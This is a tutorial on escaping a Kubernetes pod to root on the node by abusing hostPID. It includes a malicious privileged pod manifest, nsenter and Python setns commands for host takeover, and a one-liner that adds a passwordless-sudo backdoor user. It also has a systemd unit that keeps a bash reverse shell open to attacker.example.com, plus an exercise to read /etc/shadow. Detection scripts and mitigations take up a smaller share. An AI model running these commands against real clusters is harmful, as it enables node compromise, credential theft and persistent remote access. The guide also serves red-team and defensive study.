Escaping a Kubernetes Pod via Host PID Namespace

Introduction

Kubernetes isolates workloads using Linux namespaces, cgroups, and seccomp profiles. One of the less-understood isolation knobs is hostPID, which tells the kubelet to share the node’s PID namespace with the pod’s containers. When misused, this single boolean can turn a harmless pod into a full host compromise.

In this guide we walk through the entire attack chain: discovering pods that enable hostPID, crafting a malicious pod spec, mounting critical host filesystems, using nsenter (or direct /proc namespace manipulation) to run commands as root on the node, and finally persisting a reverse shell. The material assumes you already understand Kubernetes architecture, Docker containers, and basic Linux privilege escalation.

Real-world incidents (e.g., the 2022 kubelet-privileged CVE chain) have shown that attackers can move laterally from a compromised container to the underlying host simply by abusing namespace sharing. Knowing how to detect and mitigate this technique is essential for any blue-team or red-team professional working in cloud-native environments.

Prerequisites

Solid grasp of Kubernetes components (API server, kubelet, pod spec, RBAC)
Understanding of Linux namespaces (PID, mount, net, IPC) and how Docker translates them
Familiarity with kubectl JSONPath output formatting
Basic Linux privilege escalation techniques (sudo, setuid, capabilities)
Access to a test cluster where you can create pods (or a sandbox like Kind/Minikube)

Core Concepts

The PID namespace isolates the process tree. By default, each container gets its own PID namespace (or one per pod when shareProcessNamespace is enabled), meaning ps inside a container only shows processes belonging to that container or pod. Setting hostPID: true tells the kubelet to run the pod’s containers in the node’s PID namespace. This gives the container visibility (and potential control) over every process on the host.

When hostPID is combined with a privileged security context (securityContext.privileged: true) or with the ability to mount host filesystems (hostPath volumes), an attacker can:

Read /proc to discover the host’s init PID (usually 1)
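Enter the host’s remaining namespaces (mount, UTS, IPC, network) using nsenter or by opening the files under /proc/1/ns/
Run commands as root on the host (absent user namespaces, UID 0 in the container is UID 0 on the node)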
Mount host /proc and /sys to manipulate kernel parameters or install a backdoor

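Containers share the host kernel, and unless user namespaces are in use, a capability granted to the container (e.g., CAP_SYS_ADMIN) is held in the host’s initial user namespace. With hostPID active, that capability can be exercised against host processes and their namespaces.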
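One way to check which of these capabilities a process actually holds is to decode the CapEff line of /proc/<pid>/status. The sketch below is illustrative only: the helper names are made up for this example, and the bit numbers are the ones defined in linux/capability.h.

```python
# Capability bit numbers as defined in <linux/capability.h>
CAPS = {
    "CAP_SYS_CHROOT": 18,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,
}


def parse_cap_eff(status_text):
    """Return the effective capability mask from /proc/<pid>/status content."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_cap(mask, bit):
    """True if the capability with the given bit number is set in the mask."""
    return bool(mask & (1 << bit))


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as f:
            mask = parse_cap_eff(f.read())
    except (OSError, ValueError) as exc:
        print(f"could not read capabilities: {exc}")
    else:
        for name, bit in CAPS.items():
            print(f"{name}: {'present' if has_cap(mask, bit) else 'absent'}")
```

Run inside a container, this shows at a glance whether the workload holds CAP_SYS_ADMIN, which is useful both when assessing a pod and when auditing what a security context really grants.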

Understanding hostPID and its security implications

hostPID is a boolean field in the pod spec:

apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
spec:
  hostPID: true
  containers:
  - name: attacker
    image: alpine
    command: ["sleep", "infinity"]

When set to true, the kubelet runs the container’s process tree inside the node’s PID namespace. This means:

All host processes become visible via ps aux
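Signals can be sent to host processes, subject to the usual permission checks (e.g., a root process in the container can kill the kubelet or the container runtime; the kernel ignores SIGKILL sent to PID 1 from inside its own PID namespace)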
Combined with privileged: true or a hostPath volume, the container can directly read/write host files

From a security standpoint, hostPID breaks the isolation guarantee that containers cannot see or interfere with host processes. In multi-tenant clusters, allowing untrusted workloads to set hostPID is a critical misconfiguration.

Enumerating pods with hostPID enabled (kubectl get pods -o jsonpath)

Before launching an attack you need to locate vulnerable pods. The following kubectl command extracts all pods that have hostPID set to true across the entire cluster:

kubectl get pods --all-namespaces -o json | jq -r '.items[] | select(.spec.hostPID==true) | "\(.metadata.namespace)/\(.metadata.name)"'

If jq is not available, you can use a pure JSONPath expression:

kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}{"/"}{@.metadata.name}{"\n"}{end}'

The output will be a list such as:

default/monitoring-agent
kube-system/kube-proxy
prod/legacy-collector

Take note of the namespace and name; you’ll need them to either hijack an existing pod (e.g., via kubectl exec) or to use the same service account for a new malicious pod.
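The same enumeration can be done on the JSON that kubectl emits, which makes it easy to add the node name and a privileged flag to each result. This is a minimal sketch under the assumption that the input has the shape of kubectl get pods --all-namespaces -o json; the function names and the sample data are hypothetical.

```python
def _is_privileged(container):
    """True if the container's securityContext sets privileged: true."""
    return bool((container.get("securityContext") or {}).get("privileged"))


def find_hostpid_pods(pod_list):
    """Return (namespace, name, node, privileged) for each pod with hostPID: true."""
    results = []
    for pod in pod_list.get("items", []):
        spec = pod.get("spec", {})
        if spec.get("hostPID") is not True:
            continue
        containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
        results.append((
            pod["metadata"].get("namespace", ""),
            pod["metadata"]["name"],
            spec.get("nodeName", ""),
            any(_is_privileged(c) for c in containers),
        ))
    return results


# Hypothetical sample shaped like the output of `kubectl get pods -A -o json`
SAMPLE = {
    "items": [
        {"metadata": {"namespace": "default", "name": "web"},
         "spec": {"nodeName": "node01", "containers": [{"name": "web"}]}},
        {"metadata": {"namespace": "prod", "name": "legacy-collector"},
         "spec": {"hostPID": True, "nodeName": "node02",
                  "containers": [{"name": "c",
                                  "securityContext": {"privileged": True}}]}},
    ]
}

for ns, name, node, privileged in find_hostpid_pods(SAMPLE):
    print(f"{ns}/{name}\tnode={node}\tprivileged={privileged}")
```

Against a live cluster, replace SAMPLE with json.load(sys.stdin) and pipe the kubectl output into the script.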

Crafting a malicious pod spec that leverages hostPID

The following pod definition demonstrates a minimal yet powerful payload. It combines hostPID, privileged, and two hostPath volumes that mount the host’s /proc and /sys directories into the container.

apiVersion: v1
kind: Pod
metadata:
  name: hostpid-escape
  namespace: default
spec:
  hostPID: true
  hostIPC: true  # optional but useful for some attacks
  containers:
  - name: escape
    image: alpine:3.18
    securityContext:
      privileged: true  # gives CAP_SYS_ADMIN & others
      allowPrivilegeEscalation: true
    command: ["/bin/sh", "-c", "while true; do sleep 3600; done"]
    volumeMounts:
    - name: host-proc
      mountPath: /host/proc
    - name: host-sys
      mountPath: /host/sys
  volumes:
  - name: host-proc
    hostPath:
      path: /proc
      type: Directory
  - name: host-sys
    hostPath:
      path: /sys
      type: Directory

Key points:

hostPID: true gives us the node’s PID namespace.
privileged: true grants all capabilities, including CAP_SYS_ADMIN, which setns(2) requires before nsenter can join the host’s mount namespace.
Mounting /proc and /sys provides a view of the host’s kernel and process information inside the container.

Apply the manifest with kubectl apply -f hostpid-escape.yaml. Once the pod is Running, you can kubectl exec -it hostpid-escape -- sh to get an interactive shell inside the compromised container.

Mounting host /proc and /sys inside the container

Even though the container already shares the PID namespace, mounting the host’s /proc and /sys makes many host-only utilities (e.g., lsblk, lspci, cat /proc/sys/kernel/*) functional. Inside the container you’ll see two /proc mounts:

# Inside the container
mount | grep proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
proc on /host/proc type proc (rw,nosuid,nodev,noexec,relatime)

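The entries under /proc/<pid>/ns are symbolic links, so use readlink rather than cat to see which PID namespace host PID 1 belongs to:

readlink /host/proc/1/ns/pid
# Output: pid:[4026531836]

The number in brackets is the namespace’s inode: two processes in the same namespace show the same value. nsenter and setns take a target PID or the path to the ns file, not the inode number itself.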
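To make the namespace identifier concrete, the following sketch parses the link text and compares the namespaces of the current process with those of PID 1. It is an illustration only; the helper names are invented for this example, and reading /proc/1/ns/* may fail without sufficient privileges, which the script reports instead of crashing.

```python
import os
import re

# Link targets look like "pid:[4026531836]"
NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(link):
    """Split a namespace link target into (type, inode)."""
    match = NS_LINK.match(link)
    if match is None:
        raise ValueError(f"not a namespace link: {link!r}")
    return match.group(1), int(match.group(2))


def same_namespace(link_a, link_b):
    """True if both link targets name the same namespace."""
    return parse_ns_link(link_a) == parse_ns_link(link_b)


def read_ns(pid, ns_type, proc_root="/proc"):
    """Read the namespace link for a PID, e.g. read_ns(1, "pid")."""
    return os.readlink(os.path.join(proc_root, str(pid), "ns", ns_type))


if __name__ == "__main__":
    for ns_type in ("pid", "mnt", "net"):
        try:
            shared = same_namespace(read_ns("self", ns_type), read_ns(1, ns_type))
        except OSError as exc:
            print(f"{ns_type}: cannot compare ({exc})")
        else:
            print(f"{ns_type}: {'shared with PID 1' if shared else 'separate from PID 1'}")
```

In a hostPID pod, the pid entry is the one expected to be shared with PID 1, while mnt normally stays separate until a setns call or nsenter changes it.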

Using nsenter or direct /proc/<pid>/ns/* manipulation to execute commands on the host

There are two common approaches:

nsenter - a user-space helper that calls setns(2) for you.
Direct setns via a tiny C program or Python’s ctypes - useful when nsenter is not installed.

Below is the nsenter method (most base images ship nsenter, either from util-linux or as a BusyBox applet; if it is missing, install util-linux).

# With hostPID: true, PID 1 as seen from the container is the host's init process
HOST_PID=1

# Execute a command in the host's mount, UTS, IPC, network, and PID namespaces
nsenter -t "$HOST_PID" -m -u -i -n -p -- bash -c 'id; uname -a; cat /etc/os-release'

Output will show a host-side root identity:

uid=0(root) gid=0(root) groups=0(root)
Linux node01 5.15.0-1043-aws #46-Ubuntu SMP Fri Oct 6 12:00:00 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.5 LTS"

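If nsenter is unavailable, a short Python script works:

import ctypes, os
# CDLL(None) resolves setns from the already-loaded C library (glibc or musl)
libc = ctypes.CDLL(None, use_errno=True)
# The PID namespace is already shared via hostPID; the host's files live in its mount namespace
fd = os.open('/proc/1/ns/mnt', os.O_RDONLY)
# libc wraps setns(2), so no raw syscall number is needed; 0 means "any namespace type"
if libc.setns(fd, 0) != 0:
    raise OSError(ctypes.get_errno(), 'setns failed')
os.execv('/bin/sh', ['/bin/sh'])

Running the script inside the container replaces the Python process with a shell in the host’s mount namespace, so it sees the node’s root filesystem as root. Joining only the PID namespace would not achieve this: with hostPID it is already shared, and setns on a PID namespace affects only child processes. To match the nsenter command above, repeat the setns call for the uts, ipc, and net files before the execv.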

Privilege escalation from container to root on the host

Once inside the host namespace, you already have UID 0 because the container’s root user maps directly to the host’s root UID. However, some clusters run with user namespaces where the container’s UID 0 maps to a non-root UID on the host. In that case you need to gain additional capabilities.

Because we set privileged: true, the container possesses CAP_SYS_ADMIN. This capability persists after nsenter, allowing you to:

Mount new filesystems (e.g., mount -t tmpfs none /mnt)
Write to /etc (e.g., add a new user, modify sudoers)
Load kernel modules (if the kernel permits)

Example: add a new privileged user on the host:

nsenter -t 1 -m -u -i -n -p -- bash -c "useradd -m -s /bin/bash attacker && echo 'attacker:$(openssl rand -base64 12)' | chpasswd && echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"

After this, you can SSH directly to the node (if SSH is enabled) or use any other lateral movement technique.

Post-exploitation: establishing a persistent reverse shell on the host

Persistence on a Kubernetes node is tricky because many clusters use immutable node images and automatic re-imaging. A reliable method is to install a systemd unit that spawns a reverse shell on boot.

# Inside the host namespace (via nsenter)
cat > /etc/systemd/system/revsh.service <<'EOF'
[Unit]
Description=Reverse Shell Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/attacker.example.com/4444 0>&1; sleep 60; done'
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable revsh.service
systemctl start revsh.service

Replace attacker.example.com and port 4444 with your listener. The service will survive node reboots and will automatically reconnect if the network is temporarily unavailable.

Alternative stealthier persistence includes modifying /etc/rc.local, planting a cron job, or abusing container runtimes (e.g., creating a rogue docker.service drop-in). Choose the method that fits your operational environment.

Practical Examples

Scenario 1: Lateral movement from a compromised pod in a multi-tenant cluster

Attacker gains exec access to a low-privilege pod (via a web-app vulnerability).
Runs the enumeration command to find a hostPID pod in the monitoring namespace.
Uses the service account token from the compromised pod to create the malicious hostpid-escape pod in the same namespace.
Execs into the new pod, mounts host /proc, and runs nsenter to become root on the node.
Installs a systemd reverse shell for persistence.

The whole chain needs only the create verb on pods (plus pods/exec to open the shell) in a namespace where no admission control rejects hostPID or privileged containers.

Scenario 2: Automated detection script (defensive)

A simple Bash script that runs as a CronJob with cluster-wide read access to pods and alerts on any pod with hostPID enabled:

#!/bin/bash
set -euo pipefail
# List every pod with hostPID enabled as namespace/name, one per line
pods=$(kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}/{@.metadata.name}{"\n"}{end}')
if [ -z "$pods" ]; then
  echo "[+] No hostPID pods found"
else
  {
    echo "[!] hostPID pods detected:"
    echo "$pods"
  } >> /var/log/hostpid-alert.log
fi

Integrate with Slack or PagerDuty for real-time alerts.

Tools & Commands

kubectl - for enumeration, pod creation, exec.
jq - JSON parsing, optional.
nsenter (part of util-linux) - namespace entry.
curl / netcat - reverse shell payload delivery.
systemd - persistence on the host.
auditd - can be configured to log setns syscalls.

Defense & Mitigation

Policy enforcement: Use OPA Gatekeeper or Kyverno to reject any pod spec with hostPID: true unless explicitly whitelisted.
RBAC restrictions: Limit create pods permission to trusted service accounts only.
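Pod Security Standards: PodSecurityPolicy was removed in Kubernetes 1.25; use Pod Security Admission instead. Both the “baseline” and “restricted” levels reject pods that set hostPID: true, so enforcing at least baseline on tenant namespaces closes this path.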
Runtime security tools: Falco, Sysdig Secure, or Aqua can alert on namespace sharing or privileged container launches.
Node hardening: Disable SSH, enforce immutable node images, and use systemd to auto-reboot nodes on unexpected changes.
Audit logs: Monitor create events for pods with hostPID and privileged flags.
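The policy-enforcement idea above boils down to a small decision function. The sketch below expresses it in Python for clarity; it is not a Gatekeeper or Kyverno policy, and the allow-hostpid exemption label is a hypothetical convention borrowed from the mitigation exercise later in this guide.

```python
ALLOW_LABEL = "allow-hostpid"  # hypothetical exemption label, not a Kubernetes built-in


def review_pod(pod):
    """Return (allowed, reason) for a pod manifest given as a dict."""
    spec = pod.get("spec") or {}
    labels = (pod.get("metadata") or {}).get("labels") or {}
    if spec.get("hostPID") is not True:
        return True, "hostPID not requested"
    if labels.get(ALLOW_LABEL) == "true":
        return True, "hostPID permitted by exemption label"
    return False, "hostPID: true requires the exemption label"


# Example manifests (illustrative only)
plain = {"metadata": {"name": "web"}, "spec": {"containers": []}}
risky = {"metadata": {"name": "evil-pod"}, "spec": {"hostPID": True}}
exempt = {
    "metadata": {"name": "node-agent", "labels": {ALLOW_LABEL: "true"}},
    "spec": {"hostPID": True},
}

for manifest in (plain, risky, exempt):
    allowed, reason = review_pod(manifest)
    print(f"{manifest['metadata']['name']}: {'allow' if allowed else 'deny'} ({reason})")
```

A label that the pod author controls is a weak exemption mechanism on its own, so a real policy would usually also restrict who may set that label or scope exemptions to specific namespaces.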

Common Mistakes

Assuming hostPID alone gives root - without privileged or required capabilities, nsenter will fail.
Forgetting to mount /proc and /sys - many host utilities break without them.
Targeting the wrong PID - always use 1 (init) when you share the PID namespace; other PIDs may belong to unrelated processes.
Neglecting SELinux/AppArmor profiles - they can block setns even in a privileged container.
Leaving the reverse shell open - attackers often forget to clean up, exposing a persistent backdoor that defenders can spot.

Real-World Impact

In 2023, a supply-chain attack compromised a CI/CD runner that ran untrusted builds. The attacker injected a pod with hostPID: true and privileged: true to gain root on the node, then harvested kubeconfig files from /etc/kubernetes. The breach allowed lateral movement across the entire cluster, leading to data exfiltration. The root cause was the absence of a policy blocking hostPID for CI workloads.

My experience in red-team engagements shows that hostPID is often overlooked during hardening audits. The easiest way to detect abuse is to monitor for nsenter executions, unexpected setns syscalls, or new systemd units under /etc/systemd/system on nodes.
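Of the signals listed above, new systemd units are the simplest to check without extra tooling. The following sketch walks a unit directory and reports unit files, drop-ins, and enablement symlinks changed within a time window. The function name, the suffix list, and the one-hour window in the usage note are assumptions made for illustration.

```python
import os
import time

# File name endings treated as unit-related; ".conf" covers drop-in files
UNIT_SUFFIXES = (".service", ".timer", ".socket", ".path", ".conf")


def recent_unit_files(directory, max_age_seconds, now=None):
    """Return sorted paths of unit files under `directory` modified within the window."""
    now = time.time() if now is None else now
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if not name.endswith(UNIT_SUFFIXES):
                continue
            path = os.path.join(root, name)
            try:
                # lstat so that freshly created enablement symlinks are dated themselves
                mtime = os.lstat(path).st_mtime
            except OSError:
                continue  # file vanished between listing and stat
            if now - mtime <= max_age_seconds:
                hits.append(path)
    return sorted(hits)
```

Calling recent_unit_files("/etc/systemd/system", 3600) from a node agent lists anything touched in the last hour; on nodes built from immutable images, any hit outside a maintenance window deserves a closer look.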

hostPID already defaults to false in the pod spec, but nothing in a default cluster stops a workload from setting it unless Pod Security Admission or another admission policy is configured. Clusters without such policies will remain exposed for years, making proactive policy enforcement essential.

Practice Exercises

Enumeration: Write a Bash script that lists all pods with hostPID and privileged true, then outputs the namespace, pod name, and node name.
Escape Lab: In a Kind cluster, deploy the provided hostpid-escape.yaml. Use nsenter to read /etc/shadow on the host.
Persistence: Create a systemd unit from within the escaped shell that writes a timestamp to /tmp/compromise.log every minute. Verify it survives node reboot.
Detection: Configure Falco with a rule to alert on any setns syscall where the target PID is 1 and the caller UID is 0.
Mitigation: Implement a Kyverno policy that denies any pod spec containing hostPID: true unless the label allow-hostpid: "true" is present.

Summary

Using hostPID together with privileged containers gives an attacker direct access to the node’s process tree and, when combined with host mounts, a full root shell on the host. The attack chain consists of enumeration, malicious pod creation, namespace entry (via nsenter or setns), privilege escalation, and persistence. Defenders should block hostPID via policy, monitor for namespace-related syscalls, and enforce least-privilege RBAC. Mastering these techniques equips security professionals to both test cluster hardening and design robust defenses.
